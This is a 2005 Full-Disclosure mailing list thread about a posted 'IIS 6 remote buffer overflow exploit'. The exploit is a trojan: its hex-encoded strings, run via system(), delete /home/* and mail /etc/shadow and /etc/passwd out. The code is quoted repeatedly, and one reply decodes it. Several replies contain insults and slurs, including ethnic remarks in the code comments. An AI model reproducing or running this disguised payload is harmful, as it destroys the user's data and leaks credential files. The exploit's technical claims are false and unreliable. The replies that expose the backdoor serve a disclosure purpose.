Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
Kind of like your attempt to be American :) --- Javi Polo <[EMAIL PROTECTED]> wrote: > On Apr/20/2005, Day Jay wrote: > > > You are wrong again, it's "Smashing the Stick" you > > moron. Not smashing the stack. Ask anyone here! > > Man, you are such a newbie. Get a clue and stop > trying > > to say the sweet code is a backdoor just because > you > > don't know how to compile software properly. > You're > > nothing but a newbie wanna be C programmer with a > dick > > in his ass and a lack of hacking skills. > . > > Should this list be moderated? > > it's starting to be a pile of shit ... :/ > > -- > Javi Polo @ VirtualSys > Diputació 306, Enlo. 1ª 08009 Barcelona > [T] +34 93 412 37 50 [F] +34 93 342 58 72 > http://www.virtualsys.com > ___ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - > http://secunia.com/ > __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
not as lame as you are! Take your ham and shove it! What a faggit. --- Ed Carp <[EMAIL PROTECTED]> wrote: > Javi Polo wrote: > > > On Apr/20/2005, Day Jay wrote: > > > >>You are wrong again, it's "Smashing the Stick" you > >>moron. Not smashing the stack. Ask anyone here! > >>Man, you are such a newbie. Get a clue and stop > trying > >>to say the sweet code is a backdoor just because > you > >>don't know how to compile software properly. > You're > >>nothing but a newbie wanna be C programmer with a > dick > >>in his ass and a lack of hacking skills. > > > > . > > > > Should this list be moderated? > > > > it's starting to be a pile of shit ... :/ > > Starting?? It always has - 90% of the messages here > are pure bullshit. Fortunately, there is 10% pure > gold here, which is the *only* reason why I'm still > here, and I suspect that goes for a lot of other > people here. > > The juvenile wanna-be crackers who post here so much > like to use profanity to pump themselves up - to > compensate for their lack of technical skills, no > doubt. "Gee, I'm a real *man* because I can spin a > clever put-down and use as much profanity as > possible..." > > How incredibly lame. > -- > Ed Carp, N7EKG > President > Lightspeed Software, Inc. > Navarre, FL > (850) 291-1563 > "Internet applications software for the rest of us" > ___ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - > http://secunia.com/ > __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
The ONLY posts I don't like are posts like that, complaining about the list. Like somebody else said, the rest of this list provides great "comic relief"! Javi Polo wrote: On Apr/20/2005, Day Jay wrote: You are wrong again, it's "Smashing the Stick" you moron. Not smashing the stack. Ask anyone here! Man, you are such a newbie. Get a clue and stop trying to say the sweet code is a backdoor just because you don't know how to compile software properly. You're nothing but a newbie wanna be C programmer with a dick in his ass and a lack of hacking skills. . Should this list be moderated? it's starting to be a pile of shit ... :/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
I actually have two other separate e-mail accounts. One for normal mail. And one for lists. This one is reserved specifically for FD. I don't even need mail filters, having different e-mail addresses does it all for me. On 4/21/05, Joachim Schipper <[EMAIL PROTECTED]> wrote: > On Thu, Apr 21, 2005 at 04:32:39AM -0500, Ed Carp wrote: > > Javi Polo wrote: > > > > >On Apr/20/2005, Day Jay wrote: > > > > > >>You are wrong again, it's "Smashing the Stick" you > > >>moron. Not smashing the stack. Ask anyone here! > > >>Man, you are such a newbie. Get a clue and stop trying > > >>to say the sweet code is a backdoor just because you > > >>don't know how to compile software properly. You're > > >>nothing but a newbie wanna be C programmer with a dick > > >>in his ass and a lack of hacking skills. > > > > > >. > > > > > >Should this list be moderated? > > > > > >it's starting to be a pile of shit ... :/ > > > > Starting?? It always has - 90% of the messages here are pure bullshit. > > Fortunately, there is 10% pure gold here, which is the *only* reason why > > I'm still here, and I suspect that goes for a lot of other people here. > > > > The juvenile wanna-be crackers who post here so much like to use profanity > > to pump themselves up - to compensate for their lack of technical skills, > > no doubt. "Gee, I'm a real *man* because I can spin a clever put-down and > > use as much profanity as possible..." > > > > How incredibly lame. > > Hey, don't be too harsh on the list - most is useful, and the rest > provides comic relief. ;-) > >Joachim > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
On Thu, Apr 21, 2005 at 04:32:39AM -0500, Ed Carp wrote: > Javi Polo wrote: > > >On Apr/20/2005, Day Jay wrote: > > > >>You are wrong again, it's "Smashing the Stick" you > >>moron. Not smashing the stack. Ask anyone here! > >>Man, you are such a newbie. Get a clue and stop trying > >>to say the sweet code is a backdoor just because you > >>don't know how to compile software properly. You're > >>nothing but a newbie wanna be C programmer with a dick > >>in his ass and a lack of hacking skills. > > > >. > > > >Should this list be moderated? > > > >it's starting to be a pile of shit ... :/ > > Starting?? It always has - 90% of the messages here are pure bullshit. > Fortunately, there is 10% pure gold here, which is the *only* reason why > I'm still here, and I suspect that goes for a lot of other people here. > > The juvenile wanna-be crackers who post here so much like to use profanity > to pump themselves up - to compensate for their lack of technical skills, > no doubt. "Gee, I'm a real *man* because I can spin a clever put-down and > use as much profanity as possible..." > > How incredibly lame. Hey, don't be too harsh on the list - most is useful, and the rest provides comic relief. ;-) Joachim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
Javi Polo wrote: On Apr/20/2005, Day Jay wrote: You are wrong again, it's "Smashing the Stick" you moron. Not smashing the stack. Ask anyone here! Man, you are such a newbie. Get a clue and stop trying to say the sweet code is a backdoor just because you don't know how to compile software properly. You're nothing but a newbie wanna be C programmer with a dick in his ass and a lack of hacking skills. . Should this list be moderated? it's starting to be a pile of shit ... :/ Starting?? It always has - 90% of the messages here are pure bullshit. Fortunately, there is 10% pure gold here, which is the *only* reason why I'm still here, and I suspect that goes for a lot of other people here. The juvenile wanna-be crackers who post here so much like to use profanity to pump themselves up - to compensate for their lack of technical skills, no doubt. "Gee, I'm a real *man* because I can spin a clever put-down and use as much profanity as possible..." How incredibly lame. -- Ed Carp, N7EKG President Lightspeed Software, Inc. Navarre, FL (850) 291-1563 "Internet applications software for the rest of us" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
On Apr/20/2005, Day Jay wrote: > You are wrong again, it's "Smashing the Stick" you > moron. Not smashing the stack. Ask anyone here! > Man, you are such a newbie. Get a clue and stop trying > to say the sweet code is a backdoor just because you > don't know how to compile software properly. You're > nothing but a newbie wanna be C programmer with a dick > in his ass and a lack of hacking skills. . Should this list be moderated? it's starting to be a pile of shit ... :/ -- Javi Polo @ VirtualSys Diputació 306, Enlo. 1ª 08009 Barcelona [T] +34 93 412 37 50 [F] +34 93 342 58 72 http://www.virtualsys.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
You are wrong again, it's "Smashing the Stick" you moron. Not smashing the stack. Ask anyone here! Man, you are such a newbie. Get a clue and stop trying to say the sweet code is a backdoor just because you don't know how to compile software properly. You're nothing but a newbie wanna be C programmer with a dick in his ass and a lack of hacking skills. Die slowly kthxbye! --- vulcanius <[EMAIL PROTECTED]> wrote: > Last time I checked it was Smashing the Stack, not > Smashing the Stick > moron. And why the hell do you keep reposting the > code when everyone > already knows it's a lame backdoor attempt? > > On 4/20/05, Day Jay <[EMAIL PROTECTED]> wrote: > > Yes it is you hat squad lammer newbie. Now get it > to > > work!! You fucking newbie. > > > > You're so lame and so is your file system. > > > > --- "[EMAIL PROTECTED]" > <[EMAIL PROTECTED]> > > wrote: > > > perfect asshole > > > > > > > > > - > > > class101 > > > Jr. Researcher > > > Hat-Squad.com > > > > > > ----------------------------- > > > ----- Original Message - > > > From: "Day Jay" <[EMAIL PROTECTED]> > > > To: > > > Sent: Wednesday, April 20, 2005 8:15 PM > > > Subject: [Full-disclosure] FIXED CODE - IIS 6 > Remote > > > Buffer Overflow > > > Exploit(was broken) > > > > > > > > > > Sorry, the previous code was broken. This code > > > should > > > > work... > > > > > > > > Happy Owning!! :) > > > > > > > > > > > > =SNIP > > > > /* Proof of concept code > > > > Please don't send us e-mails > > > > asking us "how to hack" because > > > > we will be forced to skullfsck you. > > > > > > > > DISCLAIMER: > > > > !!NOT RESPONSIBLE WITH YOUR USE OF THIS > CODE!! > > > > > > > > IIS 6 Buffer Overflow Exploit > > > > > > > > BUG: inetinfo.exe improperly bound checks > > > > http requests sent longer than 6998 chars. > > > > Can get messy but enough testing, and we > have > > > > found a way in. > > > > > > > > VENDOR STATUS: Notified > > > > FIX: In process > > > > > > > > Remote root. > > > > > > > > eg. > > > > #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80 > > > > + Connecting to host... > > > > + Connected. > > > > + Inserting Shellcode... > > > > + Done... > > > > + Spawining shell.. > > > > > > > > Microsoft Windows XP [Version 5.1.2600] > > > > (C) Copyright 1985-2001 Microsoft Corp. > > > > C:\ > > > > > > > > > > > > > > > > */ > > > > char shellcode[] = > > > > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20" > > > > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d" > > > > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61" > > > > "\x72\x3b\x65\x63\x68\x6f\x20\x62" > > > > "\x6c\x34\x63\x6b\x68\x34\x74\x2c" > > > > "\x68\x65\x68\x65"; > > > > > > > > char launcher [] = > > > > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73" > > > > "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69" > > > > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" > > > > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" > > > > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" > > > > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; > > > > > > > > char netcat_shell [] = > > > > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70" > > > > "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69" > > > > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" > > > > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" > > > > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" > > > > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; > > > > > > > > > > > > main() > > > > { > > > > > > > > file://Section Initialises designs > implemented by > > &
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
Yes it is you hat squad lammer newbie. Now get it to work!! You fucking newbie. You're so lame and so is your file system. --- "[EMAIL PROTECTED]" <[EMAIL PROTECTED]> wrote: > perfect asshole > > - > class101 > Jr. Researcher > Hat-Squad.com > - > - Original Message - > From: "Day Jay" <[EMAIL PROTECTED]> > To: > Sent: Wednesday, April 20, 2005 8:15 PM > Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote > Buffer Overflow > Exploit(was broken) > > > > Sorry, the previous code was broken. This code > should > > work... > > > > Happy Owning!! :) > > > > > > =SNIP > > /* Proof of concept code > > Please don't send us e-mails > > asking us "how to hack" because > > we will be forced to skullfsck you. > > > > DISCLAIMER: > > !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!! > > > > IIS 6 Buffer Overflow Exploit > > > > BUG: inetinfo.exe improperly bound checks > > http requests sent longer than 6998 chars. > > Can get messy but enough testing, and we have > > found a way in. > > > > VENDOR STATUS: Notified > > FIX: In process > > > > Remote root. > > > > eg. > > #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80 > > + Connecting to host... > > + Connected. > > + Inserting Shellcode... > > + Done... > > + Spawining shell.. > > > > Microsoft Windows XP [Version 5.1.2600] > > (C) Copyright 1985-2001 Microsoft Corp. > > C:\ > > > > > > > > */ > > char shellcode[] = > > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20" > > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d" > > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61" > > "\x72\x3b\x65\x63\x68\x6f\x20\x62" > > "\x6c\x34\x63\x6b\x68\x34\x74\x2c" > > "\x68\x65\x68\x65"; > > > > char launcher [] = > > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73" > > "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69" > > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" > > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" > > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" > > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; > > > > char netcat_shell [] = > > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70" > > "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69" > > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" > > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" > > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" > > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; > > > > > > main() > > { > > > > file://Section Initialises designs implemented by > mexicans > > file://Imigrate > > system(launcher); > > system(netcat_shell); > > system(shellcode); > > > > file://int socket = 0; > > file://double long port = 0.0; > > > > file://#DEFINE port host address > > file://#DEFINE number of inters > > file://#DEFINE gull eeuEE > > > > // for(int j; j < 30; j++) > > { > > file://Find socket remote address fault > > printf("."); > > } > > file://overtake inetinfo here IIS_66^ > > return 0; > > } > > > > __ > > Do You Yahoo!? > > Tired of spam? Yahoo! Mail has the best spam > protection around > > http://mail.yahoo.com > > ___ > > Full-Disclosure - We believe in it. > > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - > http://secunia.com/ > > __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Dear DIk, You are thinking local buffer overflows with your "think: ret=(int *)&ret+2;(*ret)=(int)shellcode;" Wow, I think I read smashing the stick for fun and profit a long time ago, but this is a remote root exploit, it's alittle different!! Damn newbie! I mean, how lame are you? --- dk <[EMAIL PROTECTED]> wrote: > Day Jay wrote: > > Sorry, the previous code was broken. > > Definitely `borken'... I didn't even see one > /etc/passwd file in here! > Less obvious calls may catch more habitual FD code > runners next time > dude. [think: ret=(int > *)&ret+2;(*ret)=(int)shellcode;] > > ;-) > > > -- > dk > ___ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - > http://secunia.com/ > __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)
perfect asshole - class101 Jr. Researcher Hat-Squad.com - - Original Message - From: "Day Jay" <[EMAIL PROTECTED]> To: Sent: Wednesday, April 20, 2005 8:15 PM Subject: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken) > Sorry, the previous code was broken. This code should > work... > > Happy Owning!! :) > > > =SNIP > /* Proof of concept code > Please don't send us e-mails > asking us "how to hack" because > we will be forced to skullfsck you. > > DISCLAIMER: > !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!! > > IIS 6 Buffer Overflow Exploit > > BUG: inetinfo.exe improperly bound checks > http requests sent longer than 6998 chars. > Can get messy but enough testing, and we have > found a way in. > > VENDOR STATUS: Notified > FIX: In process > > Remote root. > > eg. > #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80 > + Connecting to host... > + Connected. > + Inserting Shellcode... > + Done... > + Spawining shell.. > > Microsoft Windows XP [Version 5.1.2600] > (C) Copyright 1985-2001 Microsoft Corp. > C:\ > > > > */ > char shellcode[] = > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20" > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d" > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61" > "\x72\x3b\x65\x63\x68\x6f\x20\x62" > "\x6c\x34\x63\x6b\x68\x34\x74\x2c" > "\x68\x65\x68\x65"; > > char launcher [] = > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73" > "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69" > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; > > char netcat_shell [] = > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70" > "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69" > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; > > > main() > { > > file://Section Initialises designs implemented by mexicans > file://Imigrate > system(launcher); > system(netcat_shell); > system(shellcode); > > file://int socket = 0; > file://double long port = 0.0; > > file://#DEFINE port host address > file://#DEFINE number of inters > file://#DEFINE gull eeuEE > > // for(int j; j < 30; j++) > { > file://Find socket remote address fault > printf("."); > } > file://overtake inetinfo here IIS_66^ > return 0; > } > > __ > Do You Yahoo!? > Tired of spam? Yahoo! Mail has the best spam protection around > http://mail.yahoo.com > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Cute. shellcode = "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe" launcher = "cat /etc/shadow |mail full-disclosure@lists.grok.org.uk " netcat_shell = "cat /etc/passwd |mail full-disclosure@lists.grok.org.uk " On Wed, 20 Apr 2005, Day Jay wrote: > Sorry, the previous code was broken. This code should > work... > > Happy Owning!! :) > > > =SNIP > /* Proof of concept code > Please don't send us e-mails > asking us "how to hack" because > we will be forced to skullfsck you. > > DISCLAIMER: > !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!! > > IIS 6 Buffer Overflow Exploit > > BUG: inetinfo.exe improperly bound checks > http requests sent longer than 6998 chars. > Can get messy but enough testing, and we have > found a way in. > > VENDOR STATUS: Notified > FIX: In process > > Remote root. > > eg. > #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80 > + Connecting to host... > + Connected. > + Inserting Shellcode... > + Done... > + Spawining shell.. > > Microsoft Windows XP [Version 5.1.2600] > (C) Copyright 1985-2001 Microsoft Corp. > C:\ > > > > */ > char shellcode[] = > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20" > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d" > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61" > "\x72\x3b\x65\x63\x68\x6f\x20\x62" > "\x6c\x34\x63\x6b\x68\x34\x74\x2c" > "\x68\x65\x68\x65"; > > char launcher [] = > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73" > "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69" > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; > > char netcat_shell [] = > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70" > "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69" > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; > > > main() > { > > //Section Initialises designs implemented by mexicans > //Imigrate > system(launcher); > system(netcat_shell); > system(shellcode); > > //int socket = 0; > //double long port = 0.0; > > //#DEFINE port host address > //#DEFINE number of inters > //#DEFINE gull eeuEE > > // for(int j; j < 30; j++) > { > //Find socket remote address fault > printf("."); > } > //overtake inetinfo here IIS_66^ > return 0; > } > > __ > Do You Yahoo!? > Tired of spam? Yahoo! Mail has the best spam protection around > http://mail.yahoo.com > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Day Jay wrote: Sorry, the previous code was broken. Definitely `borken'... I didn't even see one /etc/passwd file in here! Less obvious calls may catch more habitual FD code runners next time dude. [think: ret=(int *)&ret+2;(*ret)=(int)shellcode;] ;-) -- dk ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
that has to be like the worst backdooring ever. The printf()'s are not even there :P On 4/20/05, Day Jay <[EMAIL PROTECTED]> wrote: > Sorry, the previous code was broken. This code should > work... > > Happy Owning!! :) > > =SNIP > /* Proof of concept code >Please don't send us e-mails >asking us "how to hack" because >we will be forced to skullfsck you. > > DISCLAIMER: > !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!! > >IIS 6 Buffer Overflow Exploit > >BUG: inetinfo.exe improperly bound checks >http requests sent longer than 6998 chars. >Can get messy but enough testing, and we have >found a way in. > >VENDOR STATUS: Notified >FIX: In process > >Remote root. > >eg. >#./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80 > + Connecting to host... > + Connected. > + Inserting Shellcode... > + Done... > + Spawining shell.. > > Microsoft Windows XP [Version 5.1.2600] >(C) Copyright 1985-2001 Microsoft Corp. >C:\ > > */ > char shellcode[] = > "\x2f\x62\x69\x6e\x2f\x72\x6d\x20" > "\x2d\x72\x66\x20\x2f\x68\x6f\x6d" > "\x65\x2f\x2a\x3b\x63\x6c\x65\x61" > "\x72\x3b\x65\x63\x68\x6f\x20\x62" > "\x6c\x34\x63\x6b\x68\x34\x74\x2c" > "\x68\x65\x68\x65"; > > char launcher [] = > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73" > "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69" > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; > > char netcat_shell [] = > "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70" > "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69" > "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" > "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" > "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" > "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; > > main() > { > > //Section Initialises designs implemented by mexicans > //Imigrate > system(launcher); > system(netcat_shell); > system(shellcode); > > //int socket = 0; > //double long port = 0.0; > > //#DEFINE port host address > //#DEFINE number of inters > //#DEFINE gull eeuEE > > // for(int j; j < 30; j++) > { > //Find socket remote address fault > printf("."); > } > //overtake inetinfo here IIS_66^ > return 0; > } > > __ > Do You Yahoo!? > Tired of spam? Yahoo! Mail has the best spam protection around > http://mail.yahoo.com > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit (was broken)
Sorry, the previous code was broken. This code should work... Happy Owning!! :) =SNIP /* Proof of concept code Please don't send us e-mails asking us "how to hack" because we will be forced to skullfsck you. DISCLAIMER: !!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!! IIS 6 Buffer Overflow Exploit BUG: inetinfo.exe improperly bound checks http requests sent longer than 6998 chars. Can get messy but enough testing, and we have found a way in. VENDOR STATUS: Notified FIX: In process Remote root. eg. #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80 + Connecting to host... + Connected. + Inserting Shellcode... + Done... + Spawining shell.. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\ */ char shellcode[] = "\x2f\x62\x69\x6e\x2f\x72\x6d\x20" "\x2d\x72\x66\x20\x2f\x68\x6f\x6d" "\x65\x2f\x2a\x3b\x63\x6c\x65\x61" "\x72\x3b\x65\x63\x68\x6f\x20\x62" "\x6c\x34\x63\x6b\x68\x34\x74\x2c" "\x68\x65\x68\x65"; char launcher [] = "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73" "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69" "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; char netcat_shell [] = "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70" "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69" "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69" "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40" "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b" "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"; main() { //Section Initialises designs implemented by mexicans //Imigrate system(launcher); system(netcat_shell); system(shellcode); //int socket = 0; //double long port = 0.0; //#DEFINE port host address //#DEFINE number of inters //#DEFINE gull eeuEE // for(int j; j < 30; j++) { //Find socket remote address fault printf("."); } //overtake inetinfo here IIS_66^ return 0; } __ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/